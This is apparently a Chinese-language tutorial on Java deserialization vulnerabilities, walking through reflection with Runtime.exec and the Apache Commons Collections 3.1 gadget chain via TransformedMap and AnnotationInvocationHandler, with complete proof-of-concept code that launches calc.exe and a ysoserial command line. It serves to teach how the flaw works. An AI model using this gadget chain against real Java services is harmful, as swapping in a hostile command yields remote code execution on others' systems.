java反序列化
1.反序列化依靠的类和方法
ObjectOutputStream类的writeObject(Object obj) 将数据序列化成序列化的字符串
ObjectInputStream类的readObject(Object obj) 将序列化的字符串反序列化成数据
2.小测试
package Serialize1;
import java.io.*;
public class Serialize {
public static void main(String[] args) throws Exception{
//要序列化的数据
String name = "sijidou";
//序列化
FileOutputStream fileOutputStream = new FileOutputStream("serialize1.txt");
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
objectOutputStream.writeObject(name);
objectOutputStream.close();
//反序列化
FileInputStream fileInputStream = new FileInputStream("serialize1.txt");
ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
Object result = objectInputStream.readObject();
objectInputStream.close();
System.out.println(result);
}
}
中间会生成一个serialize1.txt的文件,文件内容为序列化的内容
3.先聊聊命令执行和反射
java里面能够执行系统命令的类是Runtime类的exec()方法,至于getRuntime()其实就相当于new一个Runtime方法,下面代码可以弹出记事本
package Serialize1;
public class ExecTest {
public static void main(String[] args) throws Exception{
Runtime.getRuntime().exec("notepad.exe");
}
}
使用反射机制来实现Runtime的exec方法调用
package Serialize1;
import java.lang.reflect.Method;
public class ExecTest {
public static void main(String[] args) throws Exception{
Object runtime = Class.forName("java.lang.Runtime").getMethod("getRuntime", new Class[]{}).invoke(null);
//System.out.println(runtime.getClass().getName());
Class.forName("java.lang.Runtime").getMethod("exec",String.class).invoke(runtime,"notepad.exe");
}
}
这里第一句Object runtime =Class.forName("java.lang.Runtime")的作用
等价于 Object runtime = Runtime.getRuntime()
又等价于 Object runtime = new Runtime()
目的是获取一个对象实例好被下一个invoke调用
第二句Class.forName("java.lang.Runtime").xxxx的作用就是调用上一步生成的runtime实例的exec方法,并将"notepad.exe"参数传入exec()方法
getMethod(方法名, 方法类型)
invoke(某个对象实例, 传入参数)
4.利用序列化执行恶意代码
结合上面反射和序列化,将弹出记事本运用到反序列化中
package Serialize1;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
public class Serialize2 {
public static void main(String[] args) throws Exception{
//要序列化的数据
Object runtime = Class.forName("java.lang.Runtime").getMethod("getRuntime", new Class[]{}).invoke(null);
Object evil = Class.forName("java.lang.Runtime").getMethod("exec", String.class).invoke(runtime, "notepad.exe");
//不用反射,直接调用也是可以触发的
//Object evil = Runtime.getRuntime().exec("notepad.exe");
//序列化
FileOutputStream fileOutputStream = new FileOutputStream("serialize2.txt");
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
objectOutputStream.writeObject(evil);
objectOutputStream.close();
//反序列化
FileInputStream fileInputStream = new FileInputStream("serialize2.txt");
ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
Object result = objectInputStream.readObject();
objectInputStream.close();
System.out.println(result);
}
}
把evil变量存入能运行记事本的执行代码,并将内容反序列化到文件中,再打开该文件会触发打开记事本
apache的反序列化漏洞
payload中的利用反射的结构是这样的
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})
};
理解了好久,这里简述下我的理解,InvokerTransformer的构造函数如下
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}
第一个是字符串,是调用的方法名,第二个是个Class数组,带的是方法的参数的类型,第三个是Object数组,带的是方法的参数的值
以getMethod举例
第一个参数"getMethod"是这个函数的名字
第二个参数new Class[]{String.class, Class[].class}是getMethod的2个参数参数类型,一个是String,一个是class[]
第三个参数new Object[]{"getRuntime", new Class[0]}是getMethod的2个参数值,一个是getRuntime,一个是空,因为是数组形式所以要这么写
上面这个组合起来相当于 getMethod(<String> "getRuntime", <Class[]> null)
看下完整的payload代码
public class ApacheSerialize {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})
};
//将transformers数组存入ChaniedTransformer这个继承类
Transformer transformerChain = new ChainedTransformer(transformers);
//创建Map并绑定transformerChina
Map innerMap = new HashMap();
innerMap.put("value", "value");
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
//触发漏洞
Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
onlyElement.setValue("foobar");
}
}
整体说一下这个反序列化实现的过程
在InvokerTransformer下存在以下的处理过程
public Object transform(Object input) {
if (input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
return method.invoke(input, this.iArgs);
} catch (NoSuchMethodException var4) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
} catch (IllegalAccessException var5) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
} catch (InvocationTargetException var6) {
throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var6);
}
}
}
可以看到它利用了反射进行调用函数,Object是传进来的参数,this.iMethodName,this.iParamTypes和this.iArgs是类中的私有成员
这反射类比下正常的调用就是如下形式
input.(this.iMethodName(<this.iParamTypes[0]> this.iArgs[0], <this.iParamTypes[1]> this.iArgs[1]))
input是类名, this.iMethodName是方法名, 之后的this.iParamTypes是参数类型,this.iParamTypes是参数的值
查看3个私有变量传进来的方式,是利用的构造函数,即在new的时候,把参数代入到私有成员
public class InvokerTransformer implements Transformer, Serializable {
private final String iMethodName;
private final Class[] iParamTypes;
private final Object[] iArgs;
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}
因此我在payload中第一部生成的transformers数组的效果等价于
transformers[1]
input.getMethod("getRuntime", null)
transformers[2]
input.invoke(null, null);
transformers[3]
input.exec("calc.exe");
input是后面调用transform(Object input)的传参,但是这3个明显是闲散的,我们的目的是把它们组合起来
回到payload中transformers数组的第一个值是
new ConstantTransformer(Runtime.class)
为什么它的画风和其他的值不一样,这个我理解的是它会告诉之后的操作是从哪个类里面进行查找的
下面的ChainedTransformer是将数组存储为一个对象
Transformer transformerChain = new ChainedTransformer(transformers);
上面的对象将当做参数绑定到TransformedMap中,当然一同绑定的还有一个普通的hashmap对象
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
这里说明下为什么要申请个TransformedMap对象
我们为了把transform里面的内容组合起来,TransformedMap中有个如下函数
protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
super(map);
this.keyTransformer = keyTransformer;
this.valueTransformer = valueTransformer;
}
protected Object checkSetValue(Object value) {
return this.valueTransformer.transform(value);
}
申请对象的时候 上面传进来的TransformerChian会存储在this.valueTransformer中,然后checkSetValue(Object value)会调用this.valueTransformer的transform方法,并且参数是从checkSetValue中传参数入的
看一下ChainedTransformer类的transform方法
public Object transform(Object object) {
for(int i = 0; i < this.iTransformers.length; ++i) {
object = this.iTransformers[i].transform(object);
}
return object;
}
是一个反复的循环调用,后面一个transformers调用前面一个tranformers的返回值,并且会遍历一遍数组里面的所有值
再看看之前构造的chainedTransformer对象里面的内容
[0]是ConstantTransformer对象,它会返回new时候的参数中的Object对象,这里也是就是"java.Runtime"
[1]-[3]是InvokerTransformer对象,调用的是反射的代码
然后调用这个TransformedMap对象的利用 Map.Entry取得第一个值,调用修改值的函数,会触发下面的setValue()代码
public Object setValue(Object value) {
value = this.parent.checkSetValue(value);
return this.entry.setValue(value);
}
而其中的checkSetValue()实际上是触发TransoformedMap的checkSetValue()方法,而此次的this.valueTransformer就是ChianedTransformer类,之后就会触发漏洞利用链
protected Object checkSetValue(Object value) {
return this.valueTransformer.transform(value);
}
整理一下思路
ChianedTransformer可以理解为一个数组容器
ChianedTransformer里面装了4个transform
TransoformedMap绑定了ChiandTransformer
step1 : 利用TransoformedMap的setValue触发ChianedTransformer的transform
step2 : ChianedTransformer的transform是一个循环调用该类里面的transformer的transform方法
step3 : 第一次循环调用ConstantTransformer("java.Runtime")对象的transformer调用参数为"foobar"(正常要修改的值),结果无影响
step4 : 第二次循环调用InvokerTransformer对象getMethod("getRuntime",null)方法,参数为("java.Runtime")会返回一个Runtime.getRuntime()方法
相当于生产一个字符串,但还没有执行,"Rumtime.getRuntime();"
step5 : 第三次循环调用InvokerTransformer对象Invoke(null,null)方法,参数为Runtime.getRuntime(),那么会返回一个Runtime对象实例
相当于执行了该字符串,Object runtime = Rumtime.getRuntime();
step6 : 第四次循环调用InvokerTransformer对象exec("clac.exe")方法,参数为一个Runtime的对象实例,会执行弹出计算器操作
调用了对象的方法,runtime.exec("clac,exe")
至此已经能够触发漏洞了,之后还会执行什么步骤无关紧要了
反序列化漏洞实现
上面的代码只是作为一段小脚本执行了,但是没有被用来通过网络传输payload,然后被反序列化利用,并且还要满足被反序列化之后还会改变map的值等总总因素的影响,假设一个理想的情况如下
public class ApacheSerialize2 implements Serializable {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map map = new HashMap();
map.put("value", "sijidou");
Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
//序列化
FileOutputStream fileOutputStream = new FileOutputStream("serialize2.txt");
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
objectOutputStream.writeObject(transformedMap);
objectOutputStream.close();
//反序列化
FileInputStream fileInputStream = new FileInputStream("serialize2.txt");
ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
Map result = (TransformedMap)objectInputStream.readObject();
objectInputStream.close();
System.out.println(result);
Map.Entry onlyElement = (Map.Entry) result.entrySet().iterator().next();
onlyElement.setValue("foobar");
该情况可以触发,但是现实中往往不一定存在把数据反序列化后,再调用其中TransformedMap的Map.Entry类型的setValue方法
在java中,自带的类中还有一个类叫做AnnotationInvocationHandler
该类中重写的readObject方法在被调用时会将其中的map,转成Map.Entry,并执行setValue操作,那么能把TransformedMap装入这个AnnotationInvocationHandler类,再传过去,就可以不用考虑之后代码是否执行setValue就可以直接利用漏洞了
private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
var1.defaultReadObject();
AnnotationType var2 = null;
try {
var2 = AnnotationType.getInstance(this.type);
} catch (IllegalArgumentException var9) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var3 = var2.memberTypes();
Iterator var4 = this.memberValues.entrySet().iterator();
while(var4.hasNext()) {
Entry var5 = (Entry)var4.next();
String var6 = (String)var5.getKey();
Class var7 = (Class)var3.get(var6);
if (var7 != null) {
Object var8 = var5.getValue();
if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
}
}
}
}
}
setValue的点在这一行
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
最后利用的payload如下
package Serialize2;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
public class ApacheSerialize2 implements Serializable {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map map = new HashMap();
map.put("value", "sijidou");
Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class, transformedMap);
//序列化
FileOutputStream fileOutputStream = new FileOutputStream("serialize3.txt");
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
objectOutputStream.writeObject(instance);
objectOutputStream.close();
//反序列化
FileInputStream fileInputStream = new FileInputStream("serialize3.txt");
ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
Object result = objectInputStream.readObject();
objectInputStream.close();
System.out.println(result);
}
}
为什么jdk为1.8就无法这么利用了,看jdk1.8的AnnotationInvocationHandler源码,readObject中在jdk1.7的setValue已经变成了
var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass() + "[" + var11 + "]")).setMember((Method)var5.members().get(var10));
private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
GetField var2 = var1.readFields();
Class var3 = (Class)var2.get("type", (Object)null);
Map var4 = (Map)var2.get("memberValues", (Object)null);
AnnotationType var5 = null;
try {
var5 = AnnotationType.getInstance(var3);
} catch (IllegalArgumentException var13) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var6 = var5.memberTypes();
LinkedHashMap var7 = new LinkedHashMap();
String var10;
Object var11;
for(Iterator var8 = var4.entrySet().iterator(); var8.hasNext(); var7.put(var10, var11)) {
Entry var9 = (Entry)var8.next();
var10 = (String)var9.getKey();
var11 = null;
Class var12 = (Class)var6.get(var10);
if (var12 != null) {
var11 = var9.getValue();
if (!var12.isInstance(var11) && !(var11 instanceof ExceptionProxy)) {
var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass() + "[" + var11 + "]")).setMember((Method)var5.members().get(var10));
}
}
}
AnnotationInvocationHandler.UnsafeAccessor.setType(this, var3);
AnnotationInvocationHandler.UnsafeAccessor.setMemberValues(this, var7);
}
ysoserial的包里面也有commons-collectons-3.1的payload,它利用的是jdk中的BadAttributeValueExpException这个类重写readObject来实现的
ysoserial的使用方法
java -jar ysoserial.jar CommonsCollections1 calc.exe > 1.txt
把1.txt 里面的内容反序列化化即可触发生成calc.exe的命令
https://www.cnblogs.com/ysocean/p/6516248.html
https://www.freebuf.com/vuls/170344.html
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent